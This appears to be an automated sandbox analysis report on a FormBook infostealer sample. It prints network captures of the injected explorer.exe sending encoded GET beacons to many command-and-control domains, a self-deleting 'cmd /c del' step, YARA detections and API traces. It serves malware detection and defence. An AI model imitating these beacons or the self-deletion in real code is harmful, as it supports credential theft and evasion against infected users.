                                                                      Jun 10, 2021 18:08:39.998404980 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:39.998456001 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:45.103743076 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.237399101 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.237560987 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.237778902 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.371453047 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409755945 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409797907 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409826040 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409846067 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409871101 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409894943 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409918070 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409940004 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409962893 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409986973 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.410096884 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.410152912 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.410229921 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.544152975 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544214010 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544251919 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544291019 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544290066 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.544348001 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:50.480931997 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.533935070 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.534074068 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.534192085 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.589061975 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.589107037 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.589123964 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.589318991 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.589365005 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.644109964 CEST804977578.31.67.91192.168.2.4

                                                                      UDP Packets


                                                                      DNS Queries


                                                                      DNS Answers

                                                                      Jun 10, 2021 18:08:50.479913950 CEST8.8.8.8192.168.2.40xdc7dNo error (0)cleanxcare.com78.31.67.91A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.671185970 CEST8.8.8.8192.168.2.40xb13No error (0)www.myfavbutik.com104.21.15.16A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.671185970 CEST8.8.8.8192.168.2.40xb13No error (0)www.myfavbutik.com172.67.161.4A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph


                                                                      HTTP Packets

                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      0 | 192.168.2.4 | 49763 | 147.255.162.204 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:07:54.360044956 CEST | 4940 | OUT | GET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.balloon-artists.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:07:54.556164026 CEST | 4940 | IN | HTTP/1.1 200 OK
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Server: Nginx Microsoft-HTTPAPI/2.0
                                                                      X-Powered-By: Nginx
                                                                      Date: Thu, 10 Jun 2021 16:07:51 GMT
                                                                      Connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      1 | 192.168.2.4 | 49764 | 163.44.239.73 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:00.232477903 CEST | 4968 | OUT | GET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.adultpeace.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:00.626985073 CEST | 4969 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Expires: Thu, 10 Jun 2021 17:08:00 GMT
                                                                      Cache-Control: max-age=3600
                                                                      X-Redirect-By: WordPress
                                                                      Location: http://adultpeace.com/p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS
                                                                      Content-Length: 0
                                                                      Date: Thu, 10 Jun 2021 16:08:00 GMT
                                                                      Server: LiteSpeed


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      10 | 192.168.2.4 | 49775 | 78.31.67.91 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:50.534192085 CEST | 5022 | OUT | GET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cleanxcare.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:50.589107037 CEST | 5023 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Content-Length: 707
                                                                      Date: Thu, 10 Jun 2021 16:08:50 GMT
                                                                      Location: https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Vary: User-Agent
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      2 | 192.168.2.4 | 49765 | 74.220.199.8 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:06.041508913 CEST | 4969 | OUT | GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cmannouncements.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:06.536820889 CEST | 4970 | OUT | GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cmannouncements.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:06.724903107 CEST | 4971 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 10 Jun 2021 16:08:06 GMT
                                                                      Server: Apache/2.2.31 (CentOS)
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=ISO-8859-1


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      3 | 192.168.2.4 | 49766 | 172.107.55.6 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:11.821222067 CEST | 4976 | OUT | GET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.leonardocarrillo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:12.061254978 CEST | 4977 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx
                                                                      Date: Thu, 10 Jun 2021 16:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Powered-By: PHP/7.3.20
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Location: http://leonardocarrillo.com/p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      4 | 192.168.2.4 | 49767 | 54.69.66.227 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:17.525732040 CEST | 4978 | OUT | GET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.dreamcashbuyers.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:17.743844032 CEST | 4978 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Location: https://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS
                                                                      Date: Thu, 10 Jun 2021 16:08:17 GMT
                                                                      Content-Length: 0
                                                                      Connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      5 | 192.168.2.4 | 49768 | 199.195.117.147 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:23.084971905 CEST | 4979 | OUT | GET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.swayam-moj.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:23.239788055 CEST | 4980 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 10 Jun 2021 16:08:23 GMT
                                                                      Server: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      6 | 192.168.2.4 | 49769 | 156.241.53.161 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:28.563146114 CEST | 4981 | OUT | GET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.hfjxhs.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:29.303756952 CEST | 4991 | IN | HTTP/1.1 302 Moved Temporarily
                                                                      Date: Thu, 10 Jun 2021 16:08:28 GMT
                                                                      Server: Apache
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      Pragma: no-cache
                                                                      Set-Cookie: PHPSESSID=8guk2q7o041l5h2cg3f0fssdf2; path=/
                                                                      Upgrade: h2
                                                                      Connection: Upgrade, close
                                                                      Location: /
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=gbk


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      7 | 192.168.2.4 | 49772 | 99.83.154.118 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:34.334511042 CEST | 5001 | OUT | GET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.defenestration.world
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:34.522964954 CEST | 5001 | IN | HTTP/1.1 403 Forbidden
                                                                      Date: Thu, 10 Jun 2021 16:08:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      8 | 192.168.2.4 | 49773 | 198.54.117.216 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:39.800529003 CEST | 5003 | OUT | GET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.boogerstv.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      9 | 192.168.2.4 | 49774 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Jun 10, 2021 18:08:45.237778902 CEST | 5004 | OUT | GET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.totally-seo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:45.409755945 CEST | 5005 | IN | HTTP/1.1 400 Bad Request
                                                                      Cache-Control: no-cache, must-revalidate
                                                                      Content-Length: 77564
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Date: Thu, 10 Jun 2021 16:08:45 UTC
                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                      Pragma: no-cache
                                                                      Server: Squarespace
                                                                      X-Contextid: SVwprJ2l/84MWoE3z
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                      Jun 10, 2021 18:08:45.409797907 CEST | 5007 | IN |
                                                                      Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family


                                                                      Code Manipulations

                                                                      System Behavior

                                                                      General

                                                                      Start time:18:06:48
                                                                      Start date:10/06/2021
                                                                      Path:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\lTAPQJikGw.exe'
                                                                      Imagebase:0xec0000
                                                                      File size:865792 bytes
                                                                      MD5 hash:16657FA097CD334973A5489EEFF8BAFE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:18:06:51
                                                                      Start date:10/06/2021
                                                                      Path:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Imagebase:0xa50000
                                                                      File size:865792 bytes
                                                                      MD5 hash:16657FA097CD334973A5489EEFF8BAFE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:18:06:54
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:18:07:24
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                      Imagebase:0xe00000
                                                                      File size:114688 bytes
                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:18:07:26
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:18:07:26
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                        Executed Functions

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36BF0
                                                                        • GetCurrentThread.KERNEL32 ref: 01B36C2D
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36C6A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01B36CC3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: c20756e2fedf94d0615ea939bbfed329db63a830cfdc64ec1e675af20caa19ba
                                                                        • Instruction ID: 53e086695b3f69a12c815f2619456be1625e9b49832b1c044a55667f81bc3b43
                                                                        • Opcode Fuzzy Hash: c20756e2fedf94d0615ea939bbfed329db63a830cfdc64ec1e675af20caa19ba
                                                                        • Instruction Fuzzy Hash: EA5164B4D002489FDB18CFAAD58879EBFF0FF89314F2080AAE418A7250D774A944CF65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36BF0
                                                                        • GetCurrentThread.KERNEL32 ref: 01B36C2D
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36C6A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01B36CC3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: a256ea4746d4c92110758c450be7c0610c567119252323bcba583b8b4e5d9fa6
                                                                        • Instruction ID: 465024a718d09e07dcf9c398f3218edde88ab117535cd55aed9812f5ac47818b
                                                                        • Opcode Fuzzy Hash: a256ea4746d4c92110758c450be7c0610c567119252323bcba583b8b4e5d9fa6
                                                                        • Instruction Fuzzy Hash: 195153B4D002499FDB18CFAAD588BDEBBF0FF89314F20846AE419A7250D774A944CF65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $%!l$$%!l
                                                                        • API String ID: 0-1936874252
                                                                        • Opcode ID: 616a5aabe8cc986e15f7e7c1b47ab3efa1d67cac55c89af4c849560d1446fa09
                                                                        • Instruction ID: e216200096cc0633024fb04bd75c75b80a83162b193bb8867a1ad72493f3762f
                                                                        • Opcode Fuzzy Hash: 616a5aabe8cc986e15f7e7c1b47ab3efa1d67cac55c89af4c849560d1446fa09
                                                                        • Instruction Fuzzy Hash: 4331A0707006118BCB28EB39C4A462E77A6AF89608F14887CDE0ACF795CF75DC058BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01B3BE0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 27cdf62b7709de635cb15ed76f4f551c6b889cda6a0a7fac49b0b37773041606
                                                                        • Instruction ID: 01b196cc87b995e979087387a5c49b5cdd61361fca0f4f8ddcf4c8fbe4af0fda
                                                                        • Opcode Fuzzy Hash: 27cdf62b7709de635cb15ed76f4f551c6b889cda6a0a7fac49b0b37773041606
